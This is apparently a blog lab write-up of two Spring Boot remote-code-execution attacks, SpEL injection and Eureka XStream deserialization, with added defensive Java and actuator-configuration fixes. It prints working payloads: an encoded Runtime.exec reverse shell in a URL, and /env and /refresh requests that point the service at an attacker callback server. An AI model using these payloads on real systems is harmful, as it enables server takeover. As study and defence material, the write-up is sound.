Spring Boot vulnerability notes

springboot-spel-rce

0x00 Discovering the vulnerability

This is the simulated book-lookup page.

The vulnerability shows here: the expression 6*2 has already been evaluated.

0x01

Attempt to exploit this vulnerability.

The attacker starts a listener with nc.

Construct a reverse-shell command.

Convert it into a byte array.

Then construct the payload and send it:

http://192.168.79.128:9091/article/?id=${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x20,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4f,0x54,0x49,0x75,0x4d,0x54,0x59,0x34,0x4c,0x6a,0x63,0x35,0x4c,0x6a,0x45,0x7a,0x4f,0x43,0x38,0x78,0x4f,0x54,0x6b,0x35,0x4f,0x53,0x41,0x77,0x50,0x69,0x59,0x78,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x20,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x20,0x2d,0x69,0x7d}))}

Exploitation succeeded.
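To show where the evaluated 6*2 comes from and how to close it off, here is an added Java example (my own, not the blog's demo application): the unsafe SpEL evaluation pattern next to a hardened variant and the plain-data alternative. It assumes the demo app evaluated the raw `id` request parameter as a SpEL template with `${` / `}` delimiters; the class and method names (`SpelLookupExample`, `renderUnsafe`, `renderHardened`, `parseId`) are invented for this example.

```java
// Added example, not code from the blog's demo app.
// Assumption: the vulnerable lookup page evaluated the raw "id" parameter as a
// SpEL template delimited by "${" and "}", which is why "?id=${6*2}" came back as 12.
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.ParserContext;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelLookupExample {

    private static final ExpressionParser PARSER = new SpelExpressionParser();
    // "${...}" template delimiters, matching the shape of the request in this write-up
    private static final ParserContext TEMPLATE = new TemplateParserContext("${", "}");

    // VULNERABLE: StandardEvaluationContext resolves T(...) type references and
    // allows method invocation, so T(java.lang.Runtime).getRuntime().exec(...)
    // runs on the server with the application's privileges.
    static String renderUnsafe(String userInput) {
        Expression exp = PARSER.parseExpression(userInput, TEMPLATE);
        return String.valueOf(exp.getValue(new StandardEvaluationContext()));
    }

    // HARDENED: SimpleEvaluationContext has no type locator, and in read-only
    // data-binding mode no method or constructor resolvers, so T(...) and any
    // method call fail with SpelEvaluationException instead of executing.
    static String renderHardened(String userInput) {
        Expression exp = PARSER.parseExpression(userInput, TEMPLATE);
        return String.valueOf(exp.getValue(SimpleEvaluationContext.forReadOnlyDataBinding().build()));
    }

    // PREFERRED: treat the id as data, never as an expression.
    static long parseId(String userInput) {
        return Long.parseLong(userInput); // "${...}" is rejected with NumberFormatException
    }

    public static void main(String[] args) {
        String probe = "${6*2}";
        String typeRef = "${T(java.lang.Runtime)}";

        System.out.println(renderUnsafe(probe));   // 12, the sign seen in 0x00
        System.out.println(renderUnsafe(typeRef)); // class java.lang.Runtime: T() resolves, exec() would too

        try {
            renderHardened(typeRef);
        } catch (SpelEvaluationException e) {
            System.out.println("blocked: " + e.getMessageCode()); // TYPE_NOT_FOUND
        }

        try {
            parseId(probe);
        } catch (NumberFormatException e) {
            System.out.println("rejected: id is not numeric");
        }
    }
}
```

`SimpleEvaluationContext` still evaluates `${6*2}`, so the probe from 0x00 would still return 12 on the hardened variant; what it removes is the `T()` type reference, method invocation and constructor calls that the `Runtime.exec` chain depends on. The real fix is the last method: parse `id` as a number and never hand request data to the expression parser.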

eureka xstream deserialization RCE

0x00

Identified it as Spring Boot; try capturing a request.

0x01

Start a listener.

Start the malicious server.

Remember to change it to your own callback host.

Started successfully.

0x02

Attempt the attack.

The Spring Boot version is 1.

Use the payload directly:

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://192.168.79.1:9999/example
POST /refresh
Content-Type: application/x-www-form-urlencoded

and the shell connects back.
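As an added configuration example (mine, not from the write-up or the target application), here is a typical weak setting that leaves the `/env` and `/refresh` endpoints used above open, next to the corrected settings. The Spring Boot 1.x keys match the version identified in this section, with Spring Cloud providing the `refresh` endpoint; the last line is the equivalent for Spring Boot 2.x.

```properties
# WEAK: actuator security switched off, so POST /env and POST /refresh are
# reachable by anyone who can talk to the service (Spring Boot 1.x keys)
management.security.enabled=false

# CORRECTED (Spring Boot 1.x keys):
# keep the actuator endpoints behind authentication ...
management.security.enabled=true
# ... and disable the two this chain needs: /env (to inject
# eureka.client.serviceUrl.defaultZone) and /refresh (to make it take effect)
endpoints.env.enabled=false
endpoints.refresh.enabled=false

# CORRECTED (Spring Boot 2.x equivalent): expose only what is needed over HTTP;
# env and refresh are then not reachable at all
management.endpoints.web.exposure.include=health,info
```

Disabling the endpoints removes the write path the attack needs (changing the Eureka registry URL at runtime); the XStream deserialization on the client side is a separate matter of keeping the Eureka client and its dependencies updated.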


Source: https://tsy244.github.io/2024/02/14/整理/springBoot漏洞整理/
Author: August Rosenberg
Posted on: February 14, 2024